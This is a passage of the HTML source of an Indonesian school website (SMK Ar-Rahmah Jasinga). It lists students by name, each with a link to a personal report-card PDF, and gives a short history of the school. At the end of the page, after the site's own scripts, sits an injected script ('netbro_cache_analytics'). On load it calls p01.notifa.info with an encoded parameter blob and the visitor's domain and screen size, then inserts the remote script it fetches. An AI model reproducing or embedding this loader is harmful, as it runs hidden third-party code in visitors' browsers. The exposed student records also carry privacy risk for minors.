                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>14</td>
              <td>IMAN</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="index.html">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>15</td>
              <td>KHAERUNNISA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/KHOERUNISA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>16</td>
              <td>MIFTAHUDIN</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/MIFTAHUDIN.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>17</td>
              <td>MUHAMAD DARUL</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/DARUL.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>18</td>
              <td>MUHAMAD IMAN</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/IMAN.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>19</td>
              <td>MUHAMAD KAFI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/KAFI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>20</td>
              <td>MUHAMAD TUNGGAL</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/TUNGGAL.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>21</td>
              <td>NURMIASANTI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/MIA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>22</td>
              <td>NURPADILAH</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/NURPADILAH.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>23</td>
              <td>PURWADI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/PURWADI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>24</td>
              <td>REGINA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/REGINA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>25</td>
              <td>RISMAWAN</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/RISMAWAN.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>26</td>
              <td>ROMADONA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/ROMA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>27</td>
              <td>SILVIA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/SILVI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>28</td>
              <td>RINDIYANI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/RINDI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>29</td>
              <td>SUHAENI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/SUEN.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>30</td>
              <td>TAJKI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/TAJKI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>31</td>
              <td>ULPIAH</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/ILA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>32</td>
              <td>YANAH</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/YANAH.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>33</td>
              <td>AANG GUSTOMI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/AANG.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>34</td>
              <td>JAJANG</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="index.html">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>35</td>
              <td>JAMILATUL HASANAH</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/JAMILAH.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>36</td>
              <td>SITI ATIA FADLAH</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/ATIAH.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>37</td>
              <td>SITI BILKIS</td>
              <td>X (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/BILKIS.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>38</td>
              <td>NABILA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/NABILA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>39</td>
              <td>SARWITI</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/SARWITI.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>40</td>
              <td>FARIDA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="https://smkarrahmahjasinga.000webhostapp.com/kelasxi/FARIDA.pdf">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
             <tr>
              <td>41</td>
              <td>ISNA SALSABILA</td>
              <td>XI (PBS)</td>
              <td>0</td>
              <td>
                <a href="index.html">
                <button class="md-trigger" style="background:#FAFAFA; color:#999; margin-top:10px; float:right;">Download Raport<i class="fa fa-arrow-circle-right" style="color:#999; font-size:15px;" cursor:pointer;>
                </i>
              </button>
              </a>
              </td>
    
            </tr>
           

          </table>
          </div>
          
      </div>
      <div class="col-md-12">
        
      </div>
    </div>
    <!-- tutup -->
  </div>
  </div>
  <!--Main layout-->

  <div style="text-align: center;">
<h6 class="wow slideInLeft">
  <img border="none" height="210" src="upload/Profil/ONE.jpg" width="320"/>
</h6>
                      
                      </div>
<div style="text-align: center;">
<span style="color: red; font-family: Georgia; font-size: 20px;" >SMK AR-RAHMAH JASINGA</span>
</div>
<p style="text-align:center"> 
<span style="color: black; font-family: Georgia; font-size: 16px;">SMK AR-RAHMAH berdiri pada tahun 2018 dibawah naungan Yayasan Pendidikan Islam Ar-Rahmah Jasinga, yanag mana YPI Ar-Rahmah ini juga menaungi MTs.Nurul Huda Jasinga.
<break>
SMK Ar-RAHMAH JASINGA yang pada mulanya bernama SMK WALISONGO JASINGA kemudian diganti pada tahun 2018 sedangkan SMK WALISONGO berdiri pada tahun 2015. 
<break>
Beberapa prestasi pada mula berdirinya cukup sangat baik, karena pada tahun pertama sudah mendapatkan prestasi walaupun pada tingkat kecematan, seperti acara tahunan 17 Agustus yang sampai saat ini bertahan di posisi ke 2 gerak jalan. hingga tingkat kabupaten,jabodetabek dan provinsi pun pernah dijuarai pada lomba LPBB.
SMK AR-RAHMAH JASINGA berlokasi di Jl.Jasinga Koleang Km.06 tepat dipinggir jalan depan gardu Kp.Silongong.
Kepala Sekolah dipimpin oleh MAMAT., S.Pd., MM. dan wakilnya MAHMUDIN, S.PD. 
</break> 
</break>
</span></p>
</main> 

     </body>	

<!--Footer-->
  <footer style="margin-top:0px;" class="page-footer  text-center text-md-left mt-4 pt-4 wow fadeIn">
    <!--Footer Links-->
    <div class="container">

      <div class="row py-3 d-flex align-items-center">
        <!--Grid column-->
        <div class="col-md-7 col-lg-8">
          <!--Copyright-->
          <p class="text-center text-md-left grey-text">
             2020 Copyright: <a href="index.html" target="_blank"> Official Ar-Rahmah
            </a>
          </p>
          <!--/.Copyright-->
        </div>
        <!--Grid column-->

        <!--Grid column-->
        <div class="col-md-5 col-lg-4 ml-lg-0">
          <!--Social buttons-->
          <div class="social-section text-center text-md-left">
            <ul class="list-unstyled list-inline">
              <li class="list-inline-item mx-0">
                <a class="btn-floating btn-sm rgba-white-slight mr-xl-4">
                  <i class="fab fa-facebook-f"></i>
                </a>
              </li>
              <li class="list-inline-item mx-0">
                <a class="btn-floating btn-sm rgba-white-slight mr-xl-4">
                  <i class="fab fa-twitter"></i>
                </a>
              </li>
              <li class="list-inline-item mx-0">
                <a class="btn-floating btn-sm rgba-white-slight mr-xl-4">
                  <i class="fab fa-instagram"></i>
                </a>
              </li>
              <li class="list-inline-item mx-0">
                <a class="btn-floating btn-sm rgba-white-slight mr-xl-4">
                  <i class="fab fa-whatsapp"></i>
                </a>
              </li>
            </ul>
          </div>
          <!--/.Social buttons-->
        
        </div>
        <!--Grid column-->

      </div>
    </div>
  </footer>
  <!--/.Footer-->

    <!-- SCRIPTS -->
    <!-- Bootstrap tooltips -->
    <script type="text/javascript" src="theme/iuqi/js/popper.min.js"></script>
    <!-- Bootstrap core JavaScript -->
    <script type="text/javascript" src="theme/iuqi/js/bootstrap.min.js"></script>
    <!-- MDB core JavaScript -->
    <script type="text/javascript" src="theme/iuqi/js/mdb.min.js"></script>
    <!-- Initializations -->
    <script type="text/javascript">
        // Animations initialization
        new WOW().init();

        $(function () {
          $('[data-toggle="popover"]').popover()
        });
    </script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX6IfuMliUwh%2bbURgRnyNO4b7X%2fFQGo1nqKocv29f%2fSA2RMd930K6q4fw0xiI6kAcNceUu7zwoWdfarZM6j9tzR70ex0xY5JRc9nbUgLKWWhVmVFTs%2bfyjmFT4d%2f8b19egjtn%2b4%2bktBx%2bMN4Z9iu5jr55ACXEnY5UO9MPSwun5CJMOFZV5kw0HUC3zWmE3n7hj9bCFf7%2f40z%2fVC8KffQlJHQEsRDX680z%2fcxJHL0Dl41IBmKskdzhyAiCF71XhREuC3AzP3RdsGUBS%2fXyetX7eLM8AZMcuEVbqV6rQ7b2tMEdVjnn7JVjdFl6l4COUerSl1wZnrjLoTvU7iidGgbL5a2H5seBP2L538sdo8ifGYN1iH1bSZe0%2fdoubwImNyaUYATD4EPYL8Ub4DBFez%2b0DKQqVk4G8A%2bOznqYlvguf7AvhYyMifS0r4wylbweUtzS9KfV5RxIke3XNTpWROF9dAVnNWlhqK4k5" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>



</html>
